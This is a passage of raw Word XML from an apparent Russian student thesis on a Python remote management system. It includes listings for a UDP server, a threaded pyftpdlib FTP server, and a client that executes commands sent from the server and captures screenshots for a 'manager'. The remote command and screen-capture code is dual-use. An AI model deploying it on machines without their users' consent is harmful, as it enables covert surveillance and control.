        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>увеличение возможностей</w:t>
      </w:r>
      <w:r w:rsidR="00873682">
        <w:t xml:space="preserve"> при</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разработк</w:t>
      </w:r>
      <w:r w:rsidR="00873682">
        <w:t>е</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404DE5F9" w14:textId="77777777" w:rsidR="00810C6F" w:rsidRDefault="00810C6F" w:rsidP="00810C6F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Наряду с этим к недостаткам можно отнести:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C4B6A" w14:textId="77777777" w:rsidR="00810C6F" w:rsidRDefault="00810C6F" w:rsidP="00810C6F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>контроль за доступностью сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4665DFB3" w14:textId="77777777" w:rsidR="00810C6F" w:rsidRDefault="00810C6F" w:rsidP="00810C6F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>обслуживание сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43A6BA" w14:textId="77777777" w:rsidR="00810C6F" w:rsidRPr="0006745A" w:rsidRDefault="00810C6F" w:rsidP="006F4757">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="375FF919" w14:textId="77777777" w:rsidR="00DF09EE" w:rsidRPr="00BA0171" w:rsidRDefault="00BA0171" w:rsidP="00360450">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc104228651"/>
      <w:bookmarkStart w:id="21" w:name="_Toc105065721"/>
      <w:r w:rsidRPr="00BA0171">
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00810C6F">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D05DF5" w:rsidRPr="00BA0171">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidR="006F4757">
        <w:t xml:space="preserve">Разработка </w:t>
      </w:r>
      <w:r w:rsidR="006F4757" w:rsidRPr="00810C6F">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="006F4757" w:rsidRPr="00810C6F">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006F4757">
        <w:t>сервера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="77E41184" w14:textId="77777777" w:rsidR="00BA0171" w:rsidRPr="00BA0171" w:rsidRDefault="00BA0171" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0380E234" w14:textId="77777777" w:rsidR="0006745A" w:rsidRDefault="00DF09EE" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Для</w:t>
      </w:r>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0006745A">
        <w:t xml:space="preserve">создания собственного сервера необходимы модули языка программирования </w:t>
      </w:r>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0006745A">
        <w:t xml:space="preserve">такие как </w:t>
      </w:r>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0006745A">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0006745A">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pyftpdlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0006745A" w:rsidRPr="0006745A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02729214" w14:textId="77777777" w:rsidR="0006745A" w:rsidRDefault="0006745A" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006F4757">
        <w:t xml:space="preserve">Создаётся объект сокета сервера, с указанием </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:t>-адреса и порта</w:t>
      </w:r>
      <w:r w:rsidR="006F4757">
        <w:t>, по которым он будет доступен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005AAAB0" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2.4: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F4757" w:rsidRPr="006D560A" w14:paraId="2BEF929A" w14:textId="77777777" w:rsidTr="006F4757">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="3152D5DE" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr>
          </w:p>
          <w:p w14:paraId="51E36B66" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr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server_socket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proofErr w:type="gram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socket.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F475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socket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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socket.AF_INET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, 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socket.SOCK_DGRAM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)</w:t>
            </w:r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server_socket.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F475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bind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((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server_address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, PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C9C1C1F" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20D7E069" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C8D40B" w14:textId="77777777" w:rsidR="0006745A" w:rsidRDefault="001C0E58" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Впоследствии </w:t>
      </w:r>
      <w:r w:rsidR="006F4757">
        <w:t>сервер необходимо установить в режим бесконечного прослушивания на наличие входящих сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B70CD" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F4757">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2.5: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F4757" w:rsidRPr="006D560A" w14:paraId="16406B48" w14:textId="77777777" w:rsidTr="006F4757">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A35B43" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr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while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True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:</w:t>
            </w:r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data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, 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address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server_</w:t>
            </w:r>
            <w:proofErr w:type="gram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socket.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F475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recvfrom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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(1024)</w:t>
            </w:r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message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data.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F475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decode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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76F0FDAA" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40605AD6" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8987A0" w14:textId="77777777" w:rsidR="0006745A" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После декодирования входящих дейтаграмм из типа </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в строковый, выполня</w:t>
      </w:r>
      <w:r w:rsidR="001C0E58">
        <w:t>ю</w:t>
      </w:r>
      <w:r>
        <w:t>тся указанные блоки инструкций, в зависимости от входящих сообщений.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624F4B1" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С целью организации передачи файлов между клиентом и менеджером на </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервере разворачивается асинхронно работающий </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервер. Этого можно достичь с использованием библиотеки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запустив </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4757">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>сервер в отдельном потоке</w:t>
      </w:r>
      <w:r w:rsidR="001C0E58">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC15E7" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2.6: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F4757" w:rsidRPr="006D560A" w14:paraId="1B6806D7" w14:textId="77777777" w:rsidTr="006F4757">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A70EC19" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr>
          </w:p>
          <w:p w14:paraId="091E693C" w14:textId="77777777" w:rsidR="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr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thread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proofErr w:type="gram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threading.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F475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Thread</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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target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=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ftp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)</w:t>
            </w:r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proofErr w:type="spellStart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thread.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F475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start</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F475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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB7C75C" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="006F47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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00DB27AC" w14:textId="77777777" w:rsidR="0006745A" w:rsidRPr="006F4757" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4757">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728DA27C" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRPr="006805E4" w:rsidRDefault="001C0E58">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006805E4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F674F" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="001C0E58">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В поток передаётся функция, создающая и запускающая </w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B1540" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2.7: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C0E58" w:rsidRPr="006D560A" w14:paraId="5333A55E" w14:textId="77777777" w:rsidTr="001C0E58">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F7AD9AB" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRPr="006805E4" w:rsidRDefault="001C0E58" w:rsidP="00360450">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36FD4F69" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRPr="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="001C0E58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</w:pP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def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1C0E5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ftp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():</w:t>
            </w:r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authorizer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1C0E5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DummyAuthorizer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()</w:t>
            </w:r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authorizer.</w:t>
            </w:r>
            <w:r w:rsidRPr="001C0E5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add_user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(FTP_USER, FTP_PASSWORD, FTP_DIRECTORY,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perm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='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elradfmw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')</w:t>
            </w:r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handler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FTPHandler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handler.authorizer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authorizer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handler.banner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"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pyftpdlib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based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ftpd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ready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."</w:t>
            </w:r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Pr="001C0E58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handler.masquerade_address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server_address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handler.passive_ports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range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(60000, 65535)</w:t>
            </w:r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ftp_server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1C0E5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FTPServer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ftp_address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,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handler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)</w:t>
            </w:r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ftp_server.max_cons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256</w:t>
            </w:r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ftp_server.max_cons_per_ip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5</w:t>
            </w:r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ftp_server.</w:t>
            </w:r>
            <w:r w:rsidRPr="001C0E5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serve_forever</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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()</w:t>
            </w:r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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C0E5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pass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2EDC4444" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRPr="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="00360450">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F5BD79E" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRPr="006805E4" w:rsidRDefault="001C0E58" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016BCBC0" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="004F6A75" w:rsidRDefault="001C0E58" w:rsidP="004F6A75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В качестве </w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">адреса экземпляра </w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервера используется адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервера, но указывается другой порт для подключения. Так же для безопасности хранимых и передаваемых данных в данном экземпляре предусмотрена авторизация по логину и паролю. </w:t>
      </w:r>
      <w:bookmarkStart w:id="22" w:name="_Toc104228652"/>
    </w:p>
    <w:p w14:paraId="1F744843" w14:textId="77777777" w:rsidR="006F4757" w:rsidRPr="001C0E58" w:rsidRDefault="006F4757" w:rsidP="00360450">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B04FF11" w14:textId="77777777" w:rsidR="00360450" w:rsidRDefault="00360450" w:rsidP="001C0E58">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc105065722"/>
      <w:r w:rsidRPr="00360450">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidR="001C0E58">
        <w:t>Разработка клиентской программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="19BA1485" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="001C0E58"/>
    <w:p w14:paraId="12B1EC50" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="00731E40">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При запуске клиентской программы должно выполняться подключение к серверу. Для этого в клиентской программе указывается доступный </w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0E58">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>адрес сервера, порт</w:t>
      </w:r>
      <w:r w:rsidR="00731E40">
        <w:t>ы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="00731E40">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="00731E40">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00731E40">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="00731E40">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="00731E40">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00731E40">
        <w:t>серверов, данные авторизации для подключения</w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="00731E40">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731E40">
        <w:t xml:space="preserve">по </w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="004F6A75">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="00731E40" w:rsidRPr="00731E40">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3832A" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRDefault="00731E40" w:rsidP="00731E40">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Процесс создания сокета клиентской программы идентичен процессу создания серверного сокета. В отдельном потоке запускается функция </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00731E40">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rece</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00731E40">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00731E40">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00731E40">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00731E40">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>которая «прослушивает» сообщения, и, в зависимости от содержимого, выполняет инструкции, отправляя ответ в адрес сервера о результате выполнения.</w:t>
      </w:r>
      <w:bookmarkStart w:id="24" w:name="_Toc104228653"/>
    </w:p>
    <w:p w14:paraId="3D8BD4C0" w14:textId="77777777" w:rsidR="00731E40" w:rsidRDefault="00731E40" w:rsidP="00731E40">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Для пересылки сообщений менеджеру ответ клиента содержит специальную пометку в сообщении, отделяющую сообщения клиента при пересылке сообщений сервером менеджеру от служебных сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D9235" w14:textId="77777777" w:rsidR="00731E40" w:rsidRDefault="00731E40" w:rsidP="00731E40">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Рассмотрим исходный код функции создания и пересылки скриншота экрана от клиента к менеджеру.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EC788" w14:textId="77777777" w:rsidR="00731E40" w:rsidRDefault="00731E40" w:rsidP="00731E40">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2.8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31E40" w:rsidRPr="006D560A" w14:paraId="3345705F" w14:textId="77777777" w:rsidTr="00731E40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="268982CD" w14:textId="77777777" w:rsidR="00731E40" w:rsidRDefault="00731E40" w:rsidP="00731E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</w:pPr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</w:r>
            <w:r w:rsidR="00D648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def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window_screen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():</w:t>
            </w:r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r w:rsidR="00D648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filename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'Screen.jpg'</w:t>
            </w:r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r w:rsidR="00D648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client_socket.</w:t>
            </w:r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sendto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(f'</w:t>
            </w:r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\t</w:t>
            </w:r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[*]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Creating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screenshot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...'.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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encode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(),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server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)</w:t>
            </w:r>
            <w:r w:rsidRPr="00731E40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</w:t>
            </w:r>
            <w:r w:rsidR="00D648A1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r w:rsidRPr="00731E40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screen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ImageGrab.</w:t>
            </w:r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grab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()</w:t>
            </w:r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r w:rsidR="00D648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screen.</w:t>
            </w:r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save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os.</w:t>
            </w:r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getenv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('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ProgramData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') + f'</w:t>
            </w:r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\\{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filename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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}</w:t>
